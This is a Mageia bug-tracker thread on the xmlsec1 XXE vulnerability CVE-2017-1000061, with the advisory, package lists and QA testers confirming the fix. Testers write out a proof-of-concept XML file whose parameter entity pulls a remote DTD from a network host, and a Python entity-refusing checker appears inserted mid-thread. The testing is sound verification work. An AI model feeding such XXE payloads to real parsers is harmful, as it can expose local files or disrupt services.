| Summary: | xmlsec1 new security issue CVE-2017-1000061 | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | major | ||
| Priority: | Normal | CC: | lewyssmith, mageia, marja11, sysadmin-bugs, tarazed25 |
| Version: | 6 | Keywords: | validated_update |
| Target Milestone: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | MGA5TOO MGA5-64-OK MGA6-64-OK advisory | ||
| Source RPM: | xmlsec1-1.2.20-5.mga6.src.rpm | CVE: | CVE-2017-1000061 |
| Status comment: | |||
Description

David Walser
2017-08-21 16:43:13 CEST

David Walser
2017-08-21 16:43:18 CEST
Whiteboard: (none) => MGA6TOO, MGA5TOO
Assignee: bugsquad => pkg-bugs

Assigning to all packagers collectively, since there is no registered maintainer for this package.
Nicolas Lécureuil
2017-08-22 01:27:59 CEST
CC: (none) => mageia
Assignee: pkg-bugs => qa-bugs

pushed in updates_testing

src.rpm:
xmlsec1-1.2.24-1.mga5
xmlsec1-1.2.24-1.mga6

Advisory:
========================

Updated xmlsec1 packages fix security vulnerability:

It was discovered xmlsec1's use of libxml2 inadvertently enabled external entity expansion (XXE) along with validation. An attacker could craft an XML file that would cause xmlsec1 to try and read local files or HTTP/FTP URLs, leading to information disclosure or denial of service (CVE-2017-1000061).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000061
https://access.redhat.com/errata/RHSA-2017:2492
========================

Updated packages in core/updates_testing:
========================
xmlsec1-1.2.24-1.mga5
libxmlsec1_1-1.2.24-1.mga5
libxmlsec1-openssl1-1.2.24-1.mga5
libxmlsec1-nss1-1.2.24-1.mga5
libxmlsec1-gnutls1-1.2.24-1.mga5
libxmlsec1-gcrypt1-1.2.24-1.mga5
libxmlsec1-devel-1.2.24-1.mga5
xmlsec1-1.2.24-1.mga6
libxmlsec1_1-1.2.24-1.mga6
libxmlsec1-openssl1-1.2.24-1.mga6
libxmlsec1-nss1-1.2.24-1.mga6
libxmlsec1-gnutls1-1.2.24-1.mga6
libxmlsec1-gcrypt1-1.2.24-1.mga6
libxmlsec1-devel-1.2.24-1.mga6

from SRPMS:
xmlsec1-1.2.24-1.mga5.src.rpm
xmlsec1-1.2.24-1.mga6.src.rpm

CC: (none) => tarazed25

Testing this on mga5::x86_64, later.

mga5 x86_64

CVE-2017-1000061 PoC for XML External Entity attack.
https://github.com/lsh123/xmlsec/issues/43

Created file xinput.xml

```
$ cat xinput.xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.156/glabel.xml"> %remote;]>
```

Fake command:

```
$ xmlsec1 --verify --output output.xml input.xml
input.xml:1: I/O warning : failed to load HTTP resource
TYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.156/glabel.xml"> %remote;
                                                                               ^
%remote;
        ^
input.xml:2: parser error : Start tag expected, '<' not found

^
Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"
```

Updated from Core Updates testing:
- lib64xmlsec1-devel-1.2.24-1.mga5.x86_64
- lib64xmlsec1-gcrypt1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-gnutls1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-nss1-1.2.24-1.mga5.x86_64
- lib64xmlsec1-openssl1-1.2.24-1.mga5.x86_64
- lib64xmlsec1_1-1.2.24-1.mga5.x86_64
- xmlsec1-1.2.24-1.mga5.x86_64

```
$ xmlsec1 --verify --output output.xml copy.xml
func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=53:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='localhost:/glabel.xml'; xml error: 0: NULL
copy.xml:2: parser error : Start tag expected, '<' not found

^
func=xmlSecParseFile:file=parser.c:line=400:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=copy.xml; xml error: 4: Start tag expected, '<' not found
Error: failed to parse xml file "copy.xml"
Error: failed to load document "copy.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "copy.xml"
```

That appears to have worked. The updated software refuses to entertain External Entities.

Continuing from comment 5.

xmlsec1 looks like a standalone and

```
$ urpmq --whatrequires lib64xmlsec1_1
lib64aqebics0
lib64xmlsec1-devel
lib64xmlsec1-gcrypt1
lib64xmlsec1-gnutls1
lib64xmlsec1-nss1
lib64xmlsec1-openssl1
lib64xmlsec1_1
xmlsec1
```

shows that the library is required by other libraries. Giving this the OK based on a clean install and a positive PoC test.
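The behaviour the `xmlSecNoXxeExternalEntityLoader` message above reports (every external entity refused before anything is fetched) can be reproduced outside xmlsec1; the following is an added example using Python's standard-library expat parser, not code from xmlsec1 or from this bug. The sample documents are constructed, modelled on the PoC file above with the remote host replaced by a documentation-range placeholder.

```python
import xml.parsers.expat as expat


class ExternalEntityRefused(Exception):
    """The document referenced an external entity; nothing was fetched."""


def scan_external_entities(xml_data):
    """Parse with every external entity refused, like a no-XXE loader.

    Returns [(name, is_parameter_entity, system_id), ...] for external
    entities the DTD declares; raises ExternalEntityRefused the moment one
    is referenced (e.g. %remote; in the PoC), so no file or URL is read.
    """
    declared, refused = [], []

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities carry a value; external ones a SYSTEM/PUBLIC id.
        if system_id is not None or public_id is not None:
            declared.append((name, bool(is_param), system_id))

    def external_ref(context, base, system_id, public_id):
        # Refuse-all loader: record the attempt, return 0 so expat aborts.
        refused.append(system_id)
        return 0

    parser = expat.ParserCreate()
    # Without this expat skips <!ENTITY % ...> declarations entirely and
    # the parameter entity in the PoC would never reach our handlers.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    try:
        parser.Parse(xml_data, True)
    except expat.ExpatError as exc:
        if refused:
            raise ExternalEntityRefused("refused %r" % refused[0]) from exc
        raise  # ordinary well-formedness error, not an entity fetch
    return declared


# Constructed inputs; the PoC-style one uses a documentation-range host.
SAFE_DOC = '<?xml version="1.0"?><!DOCTYPE r [ <!ENTITY g "hi"> ]><r>&g;</r>'
DECLARED_ONLY = ('<!DOCTYPE r [ <!ENTITY ext SYSTEM "http://192.0.2.10/x.xml"> ]>'
                 '<r>declared but never referenced</r>')
POC_DOC = ('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ '
           '<!ENTITY % remote SYSTEM "http://192.0.2.10/evil.dtd"> %remote;]>')
```

Running `scan_external_entities` over the three inputs returns an empty list for SAFE_DOC, reports the unused declaration in DECLARED_ONLY, and raises ExternalEntityRefused for POC_DOC without contacting the host.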
Len Lawrence
2017-08-24 11:38:58 CEST
Whiteboard: MGA5TOO => MGA5TOO MGA5-64-OK

mga6 X86_64

```
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.1.3/evil.dtd"> %remote;]>
```

```
$ xmlsec1 --verify --output output.xml input.xml
error : Operation in progress
input.xml:1: I/O warning : failed to load external entity "http://192.168.3.1/evil.dtd"
!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.3.1/evil.dtd"> %remote;
                                                                                ^
%remote;
        ^
input.xml:3: parser error : Start tag expected, '<' not found

^
Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"
```

After updating the xml packages:

```
$ xmlsec1 --verify --output output.xml input.xml
func=xmlSecNoXxeExternalEntityLoader:file=xmlsec.c:line=53:obj=unknown:subj=xmlSecNoXxeExternalEntityLoader:error=5:libxml2 library function failed:illegal external entity='http://192.168.3.1/evil.dtd'; xml error: 0: NULL
input.xml:3: parser error : Start tag expected, '<' not found

^
func=xmlSecParseFile:file=parser.c:line=400:obj=unknown:subj=xmlParseDocument:error=5:libxml2 library function failed:filename=input.xml; xml error: 4: Start tag expected, '<' not found
Error: failed to parse xml file "input.xml"
Error: failed to load document "input.xml"
ERROR
SignedInfo References (ok/all): 0/0
Manifests References (ok/all): 0/0
Error: failed to verify file "input.xml"
```

This is good for 64-bits.
Len Lawrence
2017-08-24 15:09:39 CEST
Whiteboard: MGA5TOO MGA5-64-OK => MGA5TOO MGA5-64-OK MGA6-64-OK
Keywords: (none) => validated_update

Validating under temporary policy as we have 1 test per release.

Status: NEW => RESOLVED

An update for this issue has been pushed to the Mageia Updates repository.
http://advisories.mageia.org/MGASA-2017-0305.html